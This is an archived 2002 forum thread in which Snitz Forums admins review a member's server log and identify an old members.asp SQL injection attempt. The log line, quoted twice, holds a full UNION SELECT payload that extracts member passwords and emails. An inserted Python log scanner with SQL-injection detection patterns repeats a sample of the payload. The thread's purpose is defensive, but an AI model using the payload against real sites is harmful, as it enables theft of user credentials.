Romee
Junior Member
Netherlands
180 Posts
Posted - 03 July 2002 : 12:01:18
Like many others I get many hack attacks from IP 195.175.240.207. I am aware of that since I installed the Ozroot Hackmod. In the active users mod (4o.04) I can see that these people have a special interest in activepolls.asp (poll_mod_33), the page that is on my forum. Could this be vulnerable? R.
Davio
Development Team Member
Jamaica
12217 Posts
Posted - 03 July 2002 : 17:33:32
There is nothing to input on that page. It doesn't take anything from the URL and it doesn't have any text fields. So to answer your question: no.
«------------------------------------------------------» What new features are going to be in the 3.4 version? See the 3.4 UnOfficial Features List !
Romee
Junior Member
Netherlands
180 Posts
Posted - 03 July 2002 : 18:13:36
Thanks Davio. I studied it myself too and couldn't find anything, but the ongoing interest of these hackers made me uncertain. Romée
dayve
Forum Moderator
USA
5820 Posts
Posted - 03 July 2002 : 21:56:45
quote:
Like many others I get many hack attacks from ip 195.175.240.207
Please elaborate on why you would say many hack attacks come from this IP.
http://www.nineinchnailz.com
Romee
Junior Member
Netherlands
180 Posts
Posted - 05 July 2002 : 04:32:38
I don't know if I understand what you mean. I installed the Ozroot-hackmod and since that moment, some weeks ago, I am notified by e-mail that this IP tries to hack me (yesterday, the day before yesterday, etc.). I have read on the Snitz forum that this same IP has tried it all around. Besides all the security patches that I installed as soon as they were available, I thought, what about the mods? Are they vulnerable? And the more so, since this IP was most of the time on pages that are connected with the events mod or poll mod. Then I read on the Snitz forum some days ago about SQL injection. I found many articles on the internet about it and I realised that this was another new subject I had to take care of, since I used my forum database for many other purposes. The login procedure I used (checking the member names/passwords in the db) happened to be a piece of cake for SQL injection. I immediately changed that. When you ask me "why I say" this: because our forum means so much to me. I work very hard for it and I don't want other people to harm it. When you ask "why this IP", it is because this is the only real attacker I got. Or is your remark about naming the IP number as such? You might be right on that one. It is what many say about hooligans: don't give them a name in the paper, that is what they want.
In general: many of you are good developers, I am not. I try to understand what you do, and it gives me a lot of profit. I met some very nice people here that helped me enormously. I have this feeling of being in the taking position, and not knowing what to do in reverse. Insecure and asking for reassurance, I am afraid that is what it comes to when I elaborate on this. But perhaps I miss your point. Romée
HuwR
Forum Admin
United Kingdom
20584 Posts
Posted - 05 July 2002 : 07:15:32
Romee,
Can you post part of your log files here? We can then see what they were trying to do, and maybe give you better advice.
Romee
Junior Member
Netherlands
180 Posts
Posted - 05 July 2002 : 08:16:20
Thanks HuwR. I downloaded my logfile, opened it with WordPad and took July 3 as an example (he visited me today also). I replaced some info with the word AWAY, and hope that the remainder doesn't harm me.
2002-07-03 15:26:23 195.175.240.207 - AWAY GET /forum/active_polls.asp - 200 0 0 298 5408 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - http://www.alltheweb.com/search?q=snitz+forums&c=web&o=20&l=nl&cs=utf-8
2002-07-03 15:26:36 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/webredactie.gif - 200 0 1139 348 3355 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:37 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/imkerforum.gif - 200 0 918 347 1192 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:39 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/archieven.gif - 200 0 1540 346 1752 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:39 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/media.gif - 200 0 1388 342 1893 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/kennis.gif - 200 0 1412 343 1252 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/projecten.gif - 200 0 864 346 1071 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:40 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/chat.gif - 200 0 1299 341 841 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/links.gif - 200 0 1333 342 862 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/agenda.gif - 200 0 1450 343 892 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:41 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/home.gif - 200 0 820 341 871 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:42 195.175.240.207 - AWAY GET /assets/afbeeldingen/klik/shim.gif - 200 0 287 341 681 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/Lang1043button_login.gif - 200 0 1989 338 2002 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /assets/afbeeldingen/logoforum.jpg - 200 0 5791 341 2514 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/icon_folder_open.gif - 200 0 382 334 732 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:44 195.175.240.207 - AWAY GET /forum/icon_bar.gif - 200 0 290 326 651 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:45 195.175.240.207 - AWAY GET /forum/icon_folder_new.gif - 200 0 376 333 861 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:26:45 195.175.240.207 - AWAY GET /forum/icon_go_up.gif - 200 0 376 328 841 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ http://www.bijenhouden.nl/forum/active_polls.asp
2002-07-03 15:27:34 195.175.240.207 - AWAY GET /forum/members.asp mode=search&M_NAME=FisH%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_PASSWORD%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200 0 0 669 570 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ -
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Posted - 05 July 2002 : 08:23:35
Romée,
It doesn't look like he is trying anything with the active polls. He is trying the old members.asp bug though, but that has long been fixed. I see nothing that you should be worried about here.
Regardless of this, you should keep a backup of your DB (I think you do). Not because of the hacking; that's just a precautionary measure everyone should take.
------------------------------------------------- Installation Guide | Do's and Dont's | MODs
Edited by - ruirib on 05 July 2002 08:25:41
HuwR
Forum Admin
United Kingdom
20584 Posts
Posted - 05 July 2002 : 08:25:41
Well, this bit is definitely a hack attempt:
2002-07-03 15:27:34 195.175.240.207 - AWAY GET /forum/members.asp mode=search&M_NAME=FisH%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_PASSWORD%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200 0 0 669 570 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDGQQGGRYO=BCOCMLOAMOBFIJPEPADMKDIJ -
on your members.asp
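A defender-side check for the kind of line HuwR singles out, added here as an example and not code from the thread or from Snitz: it splits IIS W3C extended log lines in the field order Romee's extract appears to use (an assumption), URL-decodes the query string, and flags SQL syntax such as a quote closing a LIKE clause followed by UNION SELECT. The sample lines are constructed with placeholder addresses.

```python
import re
from urllib.parse import unquote_plus

# Assumed IIS W3C field order, matching the layout of the extract in the thread.
FIELDS = ("date", "time", "c_ip", "cs_username", "s_ip", "method", "uri_stem",
          "uri_query", "status", "win32_status", "sc_bytes", "cs_bytes",
          "time_taken", "version", "user_agent", "cookie", "referer")

# SQL syntax that has no business in a member search: a quote (optionally with a
# closing paren) followed by a keyword, a UNION SELECT, or comment/stacking markers.
SQLI_INDICATORS = (
    ("string-breakout", re.compile(r"'\s*\)?\s*(union|or|and)\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("comment-or-stack", re.compile(r"--|/\*|;\s*(drop|exec|shutdown)\b", re.I)),
)

def parse_line(line):
    """Split one log line into a dict; IIS writes spaces inside fields as '+',
    so splitting on whitespace is safe. Returns None for malformed lines."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def scan_log(lines):
    """Return one finding per request whose decoded query string matches an
    indicator, with the client IP, page and the matched indicator names."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["uri_query"] == "-":   # no query string at all
            continue
        decoded = unquote_plus(rec["uri_query"])     # %27 -> ', %20 and + -> space
        matched = [name for name, rx in SQLI_INDICATORS if rx.search(decoded)]
        if matched:
            findings.append({"ip": rec["c_ip"], "page": rec["uri_stem"],
                             "indicators": matched, "query": decoded})
    return findings

# Constructed sample lines (placeholder addresses), shaped like the extract above.
UA = "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)"
SAMPLE_LOG = [
    # Plain page view, no query string.
    f"2002-07-03 15:26:23 203.0.113.5 - 198.51.100.7 GET /forum/active_polls.asp - 200 0 0 298 5408 HTTP/1.1 {UA} - -",
    # Ordinary member search: no quotes or SQL keywords.
    f"2002-07-03 15:27:01 203.0.113.5 - 198.51.100.7 GET /forum/members.asp mode=search&M_NAME=Fish&initial=1&method= 200 0 0 300 1200 HTTP/1.1 {UA} - -",
    # Same shape as the attempt HuwR quotes: a quote and paren close the LIKE clause,
    # then a UNION SELECT reads other columns from the members table.
    f"2002-07-03 15:27:34 203.0.113.5 - 198.51.100.7 GET /forum/members.asp mode=search&M_NAME=FisH%25')%20UNION%20SELECT%20MEMBER_ID,%20M_NAME%20%2B%20'/'%20%2B%20M_PASSWORD%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method= 200 0 0 669 570 HTTP/1.1 {UA} - -",
]
```

The image requests that make up the rest of Romee's extract carry no query string and are skipped outright, so only the members.asp search line is reported.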
Romee
Junior Member
Netherlands
180 Posts
Posted - 05 July 2002 : 08:29:53
Thanks, Rui and HuwR. It gives a nice feeling that they try the thing that I patched, and also that you took the effort. Romée
Gremlin
General Help Moderator
New Zealand
7528 Posts
Posted - 05 July 2002 : 10:03:17
Had a hack attempt from that same IP address myself yesterday too.
www.daoc-halo.com
Hamlin
Advanced Member
United Kingdom
2386 Posts
Posted - 05 July 2002 : 10:21:53
Ahh, my simple mind can't cope with this. If it's the same IP, it does not mean the same person, I know that... but Romee said:
quote:
Like many others I get many hack attacks from ip 195.175.240.207
So I assume that means more than one... maybe by the same person. But why try more than once? If it does not work the first time, why would it work the second or third time...
I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day. --Frank Sinatra
HuwR
Forum Admin
United Kingdom
20584 Posts
Posted - 05 July 2002 : 10:29:13
Hamlin,
In the log extract that Romee posted there is only one hack attempt; all the other lines are merely server requests for the images which make up Romee's pages. They are perfectly normal and what you would expect to see in a log: every time someone connects to a page you will get tens of requests for all its items. That is normal.
Romee
Junior Member
Netherlands
180 Posts
Posted - 05 July 2002 : 11:49:07
I think Hamlin means that the same hack attempt from this IP is repeated over many days. In my log I can trace the same attempt again and again. That surprised me also. Romée
Davio
Development Team Member
Jamaica
12217 Posts
Posted - 05 July 2002 : 14:40:10
You guys are assuming that these people who try to hack your forum have sense.
«------------------------------------------------------» What new features are going to be in the 3.4 version? See the 3.4 UnOfficial Features List !